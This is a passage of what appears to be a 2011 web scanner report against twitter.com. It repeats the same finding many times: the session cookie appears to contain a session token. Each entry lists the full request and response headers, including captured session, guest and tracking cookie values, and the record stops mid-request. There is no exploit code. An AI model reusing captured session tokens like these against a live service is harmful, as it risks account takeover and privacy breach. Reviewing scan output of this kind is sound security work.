_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MjA1NDYxMTYxMzc3NzkzOgxjc3JmX2lkIiUyZmUyZWVl%250AMjgwOTk4NGY3OWE1Y2JiZTJlZjVkMWFmNzoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--8142c62a123829501cbddbd07b967c4cb31b12ef; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jayleno HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:55 GMT Server: hi Status: 200 OK X-Transaction: 1296265975-96833-20443 ETag: "f04375a0a64efa284a42025451fab18b" Last-Modified: Sat, 29 Jan 2011 01:52:55 GMT X-Runtime: 0.01621 Content-Type: text/html; charset=utf-8 Content-Length: 52179 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jbchang HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:50:33 GMT Server: hi Status: 200 OK X-Transaction: 1296265833-44616-32351 ETag: "48cc8fb365481ae35c75282f1de941fe" Last-Modified: Sat, 29 Jan 2011 01:50:33 GMT X-Runtime: 0.02514 Content-Type: text/html; charset=utf-8 Content-Length: 50548 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jobs HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:19 GMT Server: hi Status: 200 OK X-Transaction: 1296225079-13629-5258 ETag: "24f2b3be58ffd35c950d79aa330616fd" Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT X-Runtime: 0.03334 Content-Type: text/html; charset=utf-8 Content-Length: 18757 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlZDAwNDA4YmY4ZmE2OWEzNWU4MmQ0MDg5OTkxYmEz%250AMTU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--b979158e747a489fb5b4a97a6e15537893f77f1a; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /joedwinell/ HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:30 GMT Server: hi Status: 200 OK X-Transaction: 1296265290-93276-31294 ETag: "17022c0def3fb9af583820ad4dacfa32" Last-Modified: Sat, 29 Jan 2011 01:41:30 GMT X-Runtime: 0.00712 Content-Type: text/html; charset=utf-8 Content-Length: 52042 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /joemccann HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:40 GMT Server: hi Status: 200 OK X-Transaction: 1296225039-24458-21657 ETag: "2185bda414323413d07c805828e8deaa" Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT X-Runtime: 0.01186 Content-Type: text/html; charset=utf-8 Content-Length: 50599 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jordanknight HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:49 GMT Server: hi Status: 200 OK X-Transaction: 1296265969-53407-37171 ETag: "a1dbaefbdb244bad17317656f8f51eb0" Last-Modified: Sat, 29 Jan 2011 01:52:49 GMT X-Runtime: 0.01240 Content-Type: text/html; charset=utf-8 Content-Length: 47864 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kennychesney HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:50:30 GMT Server: hi Status: 200 OK X-Transaction: 1296265830-80729-13721 ETag: "3e686e5003db7b91a9692a9a7630bbcc" Last-Modified: Sat, 29 Jan 2011 01:50:30 GMT X-Runtime: 0.00912 Content-Type: text/html; charset=utf-8 Content-Length: 47073 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kfaulk33 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:29 GMT Server: hi Status: 200 OK X-Transaction: 1296265289-31703-49385 ETag: "41ff3b86a38408792b4fb731bddc8cc7" Last-Modified: Sat, 29 Jan 2011 01:41:29 GMT X-Runtime: 0.00715 Content-Type: text/html; charset=utf-8 Content-Length: 19131 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lapubell HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:26 GMT Server: hi Status: 200 OK X-Transaction: 1296225026-90981-8371 ETag: "aa94e1eda1d46648c91aba85f6351309" Last-Modified: Fri, 28 Jan 2011 14:30:26 GMT X-Runtime: 0.00798 Content-Type: text/html; charset=utf-8 Content-Length: 38074 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lapubell/status/28131682842312704 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:27 GMT Server: hi Status: 200 OK X-Transaction: 1296225027-9054-47693 ETag: "f065429d1dda5b9db71fafac7ff44f41" Last-Modified: Fri, 28 Jan 2011 14:30:27 GMT X-Runtime: 0.05699 Content-Type: text/html; charset=utf-8 Content-Length: 13805 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vbGFwdWJlbGwv%250Ac3RhdHVzLzI4MTMxNjgyODQyMzEyNzA0Ogxjc3JmX2lkIiViYzI0ZWFiYzYx%250AZjk3NTNkYjBiMDU5MDZiZWFkZTZkNDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMw%250AYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07w%250AzC0B--73b1d4476b98de5154e4e6006eaf9f2cc116e66c; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lindapizzuti HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; 